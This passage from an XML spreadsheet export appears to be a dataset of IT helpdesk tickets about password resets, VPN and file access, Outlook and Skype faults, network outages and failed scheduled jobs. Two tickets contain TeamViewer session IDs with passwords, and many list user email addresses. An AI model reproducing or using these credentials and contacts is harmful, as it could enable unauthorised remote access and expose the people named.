    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):SID_37_x000a__x000a_enter user id of user having the issue: hohlbfgtu_x000a__x000a_:_x000a__x000a_describe the issue:_x000a__x000a_unlock password logon_x000a_"/>
    <s v="otlqwuks bncsierm"/>
    <x v="19"/>
  </r>
  <r>
    <s v="vpn access to &lt;achthyardk&gt; computer name: awyl7217972"/>
    <s v="_x000a_summary:need vpn provision to access m drive from when i am away from office."/>
    <s v="rnueobcz lwhcbati"/>
    <x v="33"/>
  </r>
  <r>
    <s v="gflewxmn qnxhoryg (term date 8/31/2016) - network folder access"/>
    <s v="i never received access to tghkris wickhamtf's person folder on the network drive - i did get access to her collaboration_platform drive, but not her network folder.  i know her network folder is where she saved a lot of information - i really need to have access to this folder to access her documents.  also, i'm not sure why the communications i'm receiving regarding her collaboration_platform collaboration_platform are in german. _x000a__x000a__x000a_die endgÃ¼ltige lÃ¶schung des collaboration_platform for business von gflewxmn qnxhoryg ist in 7 tagen geplant. sie haben immer noch zeit, um wichtige dokumente an einen anderen speicherort zu kopieren. nach 7 tagen wird das collaboration_platform for business von gflewxmn qnxhoryg endgÃ¼ltig gelÃ¶scht. wechseln sie zum collaboration_platform for business von gflewxmn qnxhoryg unter &quot;"/>
    <s v="vpksyfco chosuygq"/>
    <x v="11"/>
  </r>
  <r>
    <s v="probleme mit com port \maschine stÃ¶hrmann \eaodcgsw trmzwbyc"/>
    <s v="probleme mit com port \maschine stÃ¶hrmann \eaodcgsw trmzwbyc"/>
    <s v="eaodcgsw trmzwbyc"/>
    <x v="24"/>
  </r>
  <r>
    <s v="cannot access workflow in collaboration_platform designer 2013"/>
    <s v="i recently received a new machine for work and downloaded collaboration_platform designer 2013 to access my workflow for my product move system. after linking the site, i tried to open the workflow. it gives me an error saying &quot;cannot access, restart designer and try again.&quot; i have tried restarting multiple times. please assist. "/>
    <s v="ferxqvsm esmwxqlf"/>
    <x v="15"/>
  </r>
  <r>
    <s v="unable to share screen"/>
    <s v="name:jadqhguy fvwhyenp_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:jadqhguy.fvwhyenp@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i am unable to share my screen on skype"/>
    <s v="jadqhguy fvwhyenp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot add new customer in engineering_tool application"/>
    <s v="_x000d__x000a__x000d__x000a_received from: juxitrbf.vebckrgh@gmail.com_x000d__x000a__x000d__x000a_dear company help,_x000d__x000a_why i cannot adding new customer in engineering_tool application? this happened after i downloading new update application._x000d__x000a__x000d__x000a_[cid:image003.jpg@01d2200e.6dd40c50]_x000d__x000a__x000d__x000a_"/>
    <s v="juxitrbf vebckrgh"/>
    <x v="25"/>
  </r>
  <r>
    <s v="transfer pricing - sto 4908097793"/>
    <s v="inter-company sto 5019108804 is not computing a transfer price.  is it because the material is priced at 0.37 euro per 100 pc and the order is only for 1 pc?  should they change the order to 100 pc?_x000d__x000a__x000d__x000a_"/>
    <s v="wgothrzl iokdftgn"/>
    <x v="29"/>
  </r>
  <r>
    <s v="unable to make changes in expense report"/>
    <s v="name: xmeytziq dcgwuvfk_x000a_browser: microsoft internet explorer_x000a_email: xmeytziq.dcgwuvfk@gmail.com_x000a_telephone: _x000a_summary: earlier in the week i was trying to put my expense report in but it will not let me change the cost center there was suppose to be a ticket but in for this and i was just wondering how that was going i have not received any notifications on this issue.  "/>
    <s v="xmeytziq dcgwuvfk"/>
    <x v="43"/>
  </r>
  <r>
    <s v="passwort geoyhurg chriuimjiann "/>
    <s v="_x000d__x000a__x000d__x000a_received from: nsoikcyf.jhybqael@gmail.com_x000d__x000a__x000d__x000a_bitte schalten sie meine passwÃ¶rter frei_x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="nsoikcyf jhybqael"/>
    <x v="0"/>
  </r>
  <r>
    <s v="configair server not available in production (SID_34). error message: 503 service not available"/>
    <s v="configair server not available in production (SID_34). error message: 503 service not available"/>
    <s v="iavozegx jpcudyfi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="engineering_tool and distributor_tool error."/>
    <s v="engineering_tool and distributor_tool error. unable to see customer details."/>
    <s v="insbceoa czgpyrtb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="frequent account lock out : wothyehre"/>
    <s v="frequent account lock out : wothyehre"/>
    <s v="bjtguqne xthqrzpc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my telephony_software will not allow me to pick up a call or make a call"/>
    <s v="my telephony_software will not allow me to pick up a call or make a call_x000a__x000a_phone: "/>
    <s v="nxloukai cpbzkrel"/>
    <x v="6"/>
  </r>
  <r>
    <s v="why 2 delivery notes (9169471029) were created for total 10 pcs from plant_105 to plant_322, when on plant_105 we have customer order"/>
    <s v="hello, could you please check why 2 delivery notes (9169471029) were created for total 10 pcs from plant_105 to plant_322, when on plant_105 we have customer order 35906675 for 5 pcs and no order on plant_322. we were waiting for this material and once it appeared on plant_105 stock these 2 dn for company europe gmbh - plant_322 were created. i had to ask plant_105 team for cancelation and creation dn for our order. many "/>
    <s v="vgmbxkji jukplihz"/>
    <x v="17"/>
  </r>
  <r>
    <s v="upload of monthly reports to SID_59 hana tables zmc*"/>
    <s v="upload of monthly reports to SID_59 hana tables zmc*"/>
    <s v="urhpnlaf agmsfqil"/>
    <x v="8"/>
  </r>
  <r>
    <s v="query about ticket status.: ticket_no1556096 : antjuyhony usa"/>
    <s v="ticket_no1556096 : antjuyhony usa"/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wifi not working in conference room of usa oh ..."/>
    <s v="wifi not working in conference room of usa oh ..._x000d__x000a_"/>
    <s v="aexbclqv zvapcslb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="anlagen pc an der hochdrucksinteranlage hip 10 startet nicht!"/>
    <s v="anlagen pc an der hochdrucksinteranlage hip 10 startet nicht!"/>
    <s v="kuemonqi rtexzlvh"/>
    <x v="32"/>
  </r>
  <r>
    <s v="vip 2 // upgrade to ie 11"/>
    <s v="vip 2 // upgrade to ie 11"/>
    <s v="ihozauxs ohdqmipz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to see emails in the outlook"/>
    <s v="not able to see emails in the outlook_x000a_"/>
    <s v="xioapjvd yiqubxmz"/>
    <x v="26"/>
  </r>
  <r>
    <s v="kpm hours"/>
    <s v="i have punched 6hrs on tuesday i.e. on 04/10/16 in my engineering tool but it is showing only 4hrs in my kpm._x000d__x000a_"/>
    <s v="xwcpkysq jydxhczm"/>
    <x v="25"/>
  </r>
  <r>
    <s v="not able to access bobj via ie and some tabs are missing when i open in chrome"/>
    <s v="user wasn't able to access the report via ie. hence i installed chrome to access the reports via myportal.company.com_x000d__x000a_after a while the user wasn't able to open the reports via chrome as well because some tabs dierppeared. _x000d__x000a_and the user is not able to connect to vpn via chrome._x000d__x000a__x000d__x000a_this is not related to business analytics tech team (erp bi/bw). this is something related to the browser setting. "/>
    <s v="jvxtfhkg heptuizn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkwin_HostName_768_inc failed in job_scheduler at: 10/06/2016 07:27:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_768_inc failed in job_scheduler at: 10/06/2016 07:27:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="latitude e5440 battery issue"/>
    <s v="latitude e5440 battery issue. battery light is constantly blinking red and not charging. user has to be constantly connected to the ac adapter. might require a battery replacement._x000a__x000a_phone:"/>
    <s v="juaxnvwz reampilj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="network outage :  south amerirtca - (rrc) site is  hard down is down since 6:11 am on 10/6 et"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______ 6:11 am on 10/6 et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x v="7"/>
  </r>
  <r>
    <s v="no bobj acces"/>
    <s v="name:maaryuyten_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:jvxtfhkg.heptuizn@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:no bobj acces_x000a_________________________x000a__x000a_ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_maaryuyten_x000a_ hi, i can't log in to bobj this is the error message i get_x000a_dwfiykeo argtxmvcumar3_x000a_ hello_x000a_maaryuyten_x000a_ io error error 2032_x000a_dwfiykeo argtxmvcumar3_x000a_ to get a better understanding of your issue i would like to take a look at your computer through teamviewer. please click on _x000a_maaryuyten_x000a_ id 426 816 357 pw 3276_x000a_maaryuyten_x000a_ sre you still there?_x000a_dwfiykeo argtxmvcumar3_x000a_ yes_x000a_maaryuyten_x000a_ see the issie_x000a_dwfiykeo argtxmvcumar3_x000a_ let me take screen shot of it_x000a_dwfiykeo argtxmvcumar3_x000a_ i will assign to erp bw/bi, they will look into it_x000a_"/>
    <s v="jvxtfhkg heptuizn"/>
    <x v="8"/>
  </r>
  <r>
    <s v="probleme mit gehaltsnachweis drucken \eaodcgsw trmzwbyc"/>
    <s v="probleme mit gehaltsnachweis drucken \eaodcgsw trmzwbyc"/>
    <s v="eaodcgsw trmzwbyc"/>
    <x v="24"/>
  </r>
  <r>
    <s v="uacyltoe hxgayczeing the email notification"/>
    <s v="uacyltoe hxgayczeing the email notification"/>
    <s v="zscohabw qorvugzf"/>
    <x v="35"/>
  </r>
  <r>
    <s v="probleme mit wlan  laptop \weszfyok fbadnjhu"/>
    <s v="probleme mit wlan  laptop \weszfyok fbadnjhu"/>
    <s v="weszfyok fbadnjhu"/>
    <x v="24"/>
  </r>
  <r>
    <s v="account unlock we_wu160"/>
    <s v="account unlock we_wu160"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm - screen - advanced find- create view"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ctzykflo.evzbhgru@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a__x000d__x000a_when i select in crm â€žadvanced find&quot; (1.), the next screen is scrolled (2.)._x000d__x000a__x000d__x000a_1._x000d__x000a__x000d__x000a_[cid:image003.jpg@01SID_35fca.166c0b00]_x000d__x000a__x000d__x000a_2._x000d__x000a__x000d__x000a_[cid:image004.png@01SID_35fca.166c0b00]_x000d__x000a__x000d__x000a__x000d__x000a_the symbols are moved into the query. it is nearly impossible for me to create a view._x000d__x000a__x000d__x000a_"/>
    <s v="ctzykflo evzbhgru"/>
    <x v="0"/>
  </r>
  <r>
    <s v="infopath is not working "/>
    <s v="infopath is not working "/>
    <s v="drhykngx oxviygdb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit we_wu160 \jionmpsf wnkpzcmv"/>
    <s v="probleme mit we_wu160 \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="monitor vom rfa-analysegerÃ¤t defekt"/>
    <s v="hallo ,_x000a__x000a_kannst du mal bei uns im labor vorbei schauen, da ist der monitor vom rfa-analysegerÃ¤t defekt._x000a__x000a_rclqfpgt tbnovxdp ist der ansprechpartner._x000a__x000a_"/>
    <s v="rclqfpgt tbnovxdp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="problem while changing the password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: srqyfjxz.lnagtjzi@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_while trying to change the password on _x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35fe2.0f41b4c0]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="srqyfjxz lnagtjzi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="file shatryung help required."/>
    <s v="_x000d__x000a__x000d__x000a_received from: cqargubj.krdxbfqh@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i need to send a video of machine to our customer on urgent basis. the file size is 36mb. kindly let me know how to send the same._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="cqargubj krdxbfqh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issue with adding lean tracker- collaboration_platform issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ilbkhgxd.hirsqytd@gmail.com_x000d__x000a__x000d__x000a_help desk_x000d__x000a__x000d__x000a_today i tried to open add lean event tracker link to enter new project details. while doing so i got error message, screen shot is attached for your reference._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35fde.f914b3d0]_x000d__x000a_please go through the same &amp; do the needful so that i can enter the details in lean tracker. any clarification, please revert back._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ilbkhgxd hirsqytd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="add my name to distribution lists"/>
    <s v="_x000a__x000a_received from: ploxzuts.utvimnwo@gmail.com_x000a__x000a_dear sir/madam,_x000a__x000a_pl add my name to distribution lists below:_x000a__x000a_warm "/>
    <s v="ploxzuts utvimnwo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze"/>
    <s v="uacyltoe hxgaycze"/>
    <s v="fdmaluyo tvecikxn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pls. unlock windows account of user vvgoythttu"/>
    <s v="pls. unlock windows account of user vvgoythttu"/>
    <s v="vwpxjtof vmidzswj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype for business does not work"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gzqijaoc.rfywvloa@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i need your help._x000d__x000a__x000d__x000a_my skype for business does not work in laptop._x000d__x000a_print screen is attached._x000d__x000a__x000d__x000a_teamviewer_x000d__x000a_id 1 078 70sartlgeo lhqksbdx13_x000d__x000a_password 9456_x000d__x000a__x000d__x000a_"/>
    <s v="gzqijaoc rfywvloa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="passwords - vpn, distributor_tool sync"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pgrvqtdo.hgpymwxb@gmail.com_x000d__x000a__x000d__x000a_hi_x000d__x000a__x000d__x000a_i seem to have a problem with logging into vpn, distributor_tool etc._x000d__x000a__x000d__x000a_i cannot access the 'change my password' as i need to be on vpn_x000d__x000a__x000d__x000a_any advice would be greatly appreciated._x000d__x000a__x000d__x000a_"/>
    <s v="pgrvqtdo hgpymwxb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="lasxwmhr ixqclfaz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software - log on issue - this is a windows update issue"/>
    <s v="user voethrylke is unable to log on telephony_software for the following reason:_x000a_authentication failed because the remote party has closed the transport stream (see attachment as well)_x000a_"/>
    <s v="hmrtxkfb otykaqpc"/>
    <x v="6"/>
  </r>
  <r>
    <s v="user gokcerthy SID_1 uacyltoe hxgaycze system "/>
    <s v="_x000d__x000a__x000d__x000a_received from: gacfhedw.iqustfzh@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a__x000d__x000a_i cannot login to the SID_1 uacyltoe hxgaycze system, could you please check?_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35fc2.af75dfe0]_x000d__x000a__x000d__x000a_best "/>
    <s v="gacfhedw iqustfzh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="we need a new mouse (pc: eemw8143353)"/>
    <s v="the computer-mouse from the pc eemw8143353 has a malefunktion. "/>
    <s v="bpnuklrh qjxnhueo"/>
    <x v="41"/>
  </r>
  <r>
    <s v="HostName_1276 australia patching_antivirus_sw site server if offline"/>
    <s v="it is offline since 1st oct 2016."/>
    <s v="fohvgnkd stfmcapj"/>
    <x v="11"/>
  </r>
  <r>
    <s v="aiiw8911985 india patching_antivirus_sw desktop site server is offline"/>
    <s v="it is offline since 30th sep 2016."/>
    <s v="fohvgnkd stfmcapj"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to log into skype. certificate error."/>
    <s v="unable to log into skype. certificate error."/>
    <s v="vgatnfjl sghcfzqp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset my SID_51 password "/>
    <s v="request you to reset my SID_51 password and send it across"/>
    <s v="svdefgwl sgtmurfh"/>
    <x v="19"/>
  </r>
  <r>
    <s v="we are missing confirmations in erp since 10/05/2016  07:30 o'clock"/>
    <s v="it seems that the transfer from EU_tool to erp is stopped or delay since 10/05/2016 7:30 o'clock german time. please the attachment. "/>
    <s v="zcokibmd xnrthsmj"/>
    <x v="58"/>
  </r>
  <r>
    <s v="new document types showing in list"/>
    <s v="when creating a new document in engineering tool, we're seeing three doctypes that weren't previously showing._x000d__x000a__x000d__x000a_has someone added these recently?_x000d__x000a__x000d__x000a_they're showing in SID_21, SID_1 and SID_34."/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="10"/>
  </r>
  <r>
    <s v="network outage:poncacity -schlumhdyhter-dmvpn router is down since 2:46 am et on 10/06:"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _______no__     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____________ 2:46 am et on 10/06:__________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ___na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yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    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x v="7"/>
  </r>
  <r>
    <s v="application response time (other network resources work normally)"/>
    <s v="please provide details in the template below (if multiple applications are impacted, please use the quick ticket template in the &quot;operations&quot; folder)._x000d__x000a_site / location : germany_x000d__x000a_user id (ad) :_x000d__x000a_system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj):_x000d__x000a_transactions that are slow (e.g., va01, create an order): all, erp (SID_34) is very very slow. it takes 10-15 seconds to build a page_x000d__x000a_area this belongs to (e.g., sales, finance, markhtyeting etc.):_x000d__x000a_how can this issue be replicated by the it support group:_x000d__x000a_are other users seeing this? _x000d__x000a_please attach relevant screenshots and exact times when the issue occurred:"/>
    <s v="kfirsmxn dieluyra"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power outage :germany () fine machining - company secondary vpn circuit and servers showing down since 2:20 am on 10"/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ______yes___     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________2:20 am on 10/06 et______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __na_____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ___na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na_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na_____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____na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yes____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp is not working for multiple user."/>
    <s v="erp is not working for multiple user._x000d__x000a_server : \\HostName_670 (not pinging)"/>
    <s v="vykbweum hpvctbse"/>
    <x v="3"/>
  </r>
  <r>
    <s v="urgent EU_tool germany - currently not possible to close orders - "/>
    <s v="reference ticket_no1557880 (some data entries where affected not all)_x000d__x000a__x000d__x000a_received several reports that it is currently not possible to close/complete orders. over 570 orders are currently missing._x000d__x000a_"/>
    <s v="wckrxovs aunsgzmd"/>
    <x v="25"/>
  </r>
  <r>
    <s v="kein datenabgleich zwischen EU_tool und erp in germany!"/>
    <s v="kein datenabgleich zwischen EU_tool und erp in germany!"/>
    <s v="jcgzqndm hukibzqa"/>
    <x v="25"/>
  </r>
  <r>
    <s v="kein netzwerkzugang"/>
    <s v="ich habe an meinem pc nur zugriff auf die interne festplatte. drucken funktioniert, aber kein zugriff auf z.b. die drucker server."/>
    <s v="uhiekyjz mflihxpq"/>
    <x v="11"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="_x000a__x000a_received from: nxhwyepl.mudstbxo@gmail.com_x000a__x000a_please reset the password for the below user in q-11 (quality uacyltoe hxgaycze) in erp_x000a__x000a_user - rayhtuorv_x000a__x000a_"/>
    <s v="nxhwyepl mudstbxo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2600 failed in job_scheduler at: 10/06/2016 01:32:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2600 failed in job_scheduler at: 10/06/2016 01:32:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ie 11 flash player issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rmezbnqt.ntbmkpuh@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i am unable to take ethics training course in ie11 as it is showing the below shown error, please do the needful._x000d__x000a__x000d__x000a_this error shows up even after updating the flash player_x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35fc0.b9c6a170]_x000d__x000a__x000d__x000a_"/>
    <s v="rmezbnqt ntbmkpuh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem in lean tracker"/>
    <s v="_x000d__x000a__x000d__x000a_received from: drhykngx.oxviygdb@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_there is a problem while creating a new lean tracker &amp; when we click on save &amp; upgrade option._x000d__x000a_please resolve._x000d__x000a_[cid:image001.jpg@01SID_35fc0.1a2bb6a0]_x000d__x000a__x000d__x000a_"/>
    <s v="drhykngx oxviygdb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to shared mail box &quot;investor_relation"/>
    <s v="_x000a__x000a_received from: wchidyuk.shqbfpuy@gmail.com_x000a__x000a_hello,_x000a__x000a_please usa access/add mr. shryresh rdyrty (yzeakbrl.npxbkojl@gmail.com) to shared mail box &quot;investor_relation&quot;._x000a__x000a_kindly do the needful._x000a__x000a_[cid:image001.png@01SID_35fbb.d94922c0]_x000a__x000a__x000a_with "/>
    <s v="ythucdjx mujfrsyl"/>
    <x v="11"/>
  </r>
  <r>
    <s v="the oracle listener monitor is reporting a : warning status on, HostName_136. please investigate "/>
    <s v="the oracle listener monitor is reporting a : warning status on, HostName_136. please investigate "/>
    <s v="jloygrwh acvztedi"/>
    <x v="1"/>
  </r>
  <r>
    <s v="outlook"/>
    <s v="_x000d__x000a_user got  crm and outlook configured yesterday_x000d__x000a_ outlook version earlier was old_x000d__x000a_ now after the new version has been installed along with crm_x000d__x000a_ all my mails get re downloaded every time_x000d__x000a_ specially the ones in all folders"/>
    <s v="jvpkulxw ovuweygj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkwin_HostName_770_inc failed in job_scheduler at: 10/06/2016 00:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_770_inc failed in job_scheduler at: 10/06/2016 00:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="net framdntyework 4.5 is not installed"/>
    <s v="from: wgpimkle kijhcwur [mailto:wgpimkle.kijhcwur@gmail.com] _x000d__x000a_sent: thursday, october 06, 2016 5:21 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: :erp error : microsoft .net framdntyework 4.5 is not installed_x000d__x000a__x000d__x000a_help desk_x000d__x000a__x000d__x000a_i tried to approve a credit memo (as per attached workflow mail) but the below message was shown and could not open the programdnty._x000d__x000a_please fix the issue aerp as we need to issue the credit memo soon._x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="wgpimkle kijhcwur"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp incident 336553/2016 status change"/>
    <s v="this is in SID_21._x000d__x000a__x000d__x000a_"/>
    <s v="kflqpite gbeoqsnc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3050 failed in job_scheduler at: 10/05/2016 21:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3050 failed in job_scheduler at: 10/05/2016 21:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="can't get audio skype. need it urgently for meeting today"/>
    <s v="_x000a_name:jashtyckie_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:jacyjddwline.yotywdsef@company.com_x000a_customer number:_x000a_telephone:_x000a_summary:urgent. can't get audio skype. need it urgently for meeting today"/>
    <s v="fksahqzc cdwhznbo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_221 : volume: /dev/SID_37data17 is over  98% space consumed. space available: 8.1 g"/>
    <s v="HostName_221 :_x000d__x000a__x000d__x000a_volume: /dev/SID_37data17 is over  98% space consumed. space available: 8.1 g_x000d__x000a_volume: /dev/SID_37data18 is over 98% space consumed. space available: 8.3 g."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="1"/>
  </r>
  <r>
    <s v="ticket update on inplant_866951"/>
    <s v="ticket update on inplant_866951"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open attachments on outlook"/>
    <s v="unable to open attachments on outlook"/>
    <s v="fjohugzb fhagjskd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to server files ldg sm003"/>
    <s v="i am the new plant manager at usa facility. i need access to the server drive ldg sm003, both i drive and j drive. the access should be similar to the previous plant manager misuhet milsytr."/>
    <s v="rozsyfai zncajubh"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to update passwords"/>
    <s v="unable to update passwords"/>
    <s v="hdetqcpj ehsjitcy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="node lhqsm68267 located at usa is down."/>
    <s v="node lhqsm68267 located at usa is down since 04:00 pm et on 10/05."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="11"/>
  </r>
  <r>
    <s v="vip 2 : not able to login to windows "/>
    <s v="not able to login to windows "/>
    <s v="tivbxojn gorlajmp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is frozen, unable to open"/>
    <s v="came in at 10:45am. as of 3:50pm, my folder had not been updated since 11:13am.  exited out and tried to get back in, but it will not open._x000d__x000a_"/>
    <s v="gakceqyb edrjthvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="system is slowing down while processing shipments at plant_101 every evening between 9:45 pm and 11:00 pm.  "/>
    <s v="system is slowing down while processing shipments at plant_101 every evening between 9:45 pm and 11:00 pm.  sometimes it is with z_chk process and sometimes during the kis (shipping_tool shippping system) process.  this has been going on for the last couple of months. fyzceglp vfnraqxc is the shipping supervisor during this shift and can be contacted if additional information is needed. there was ticket entered last night october 4, but was closed this morning oct 5, because the system was not slow this morning. this only happens at night. "/>
    <s v="khvzugxm yqfrcjwl"/>
    <x v="17"/>
  </r>
  <r>
    <s v="erp access issue     userid uacyltoe hxgayczekurtyar s3"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):    SID_1_x000d__x000a__x000d__x000a_enter user id of user having the issue:   uacyltoe hxgayczekurtyar s3_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with:_x000d__x000a__x000d__x000a_describe the issue:    userid uacyltoe hxgayczekurtyar s3 is needed for validation uacyltoe hxgayczeing in SID_1.   please extend this account for 2 months.   _x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="xyoiutep znpegflv"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_3049 failed in job_scheduler at: 10/05/2016 15:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3049 failed in job_scheduler at: 10/05/2016 15:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to schedule a skype meeting (option no longer on outlook)"/>
    <s v="unable to schedule a skype meeting (option no longer on outlook)"/>
    <s v="jadqhguy fvwhyenp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_866919"/>
    <s v="ticket update on inplant_866919"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="key figures being taken out from bex analyzer"/>
    <s v="key figures being taken out from bex analyzer_x000d__x000a__x000d__x000a_sales revenue key figure that gets removed autamatically"/>
    <s v="htsnaodb adjtmlzn"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1320 failed in job_scheduler at: 10/05/2016 14:35:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1320 failed in job_scheduler at: 10/05/2016 14:35:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0446902"/>
    <s v="ticket update on ticket_no0446902"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="calls are routing to laptop and not on the telephony_software phone."/>
    <s v="calls are routing to laptop and not on the telephony_software phone._x000a__x000a_phone: "/>
    <s v="bxgiwfhp hyixrzaw"/>
    <x v="6"/>
  </r>
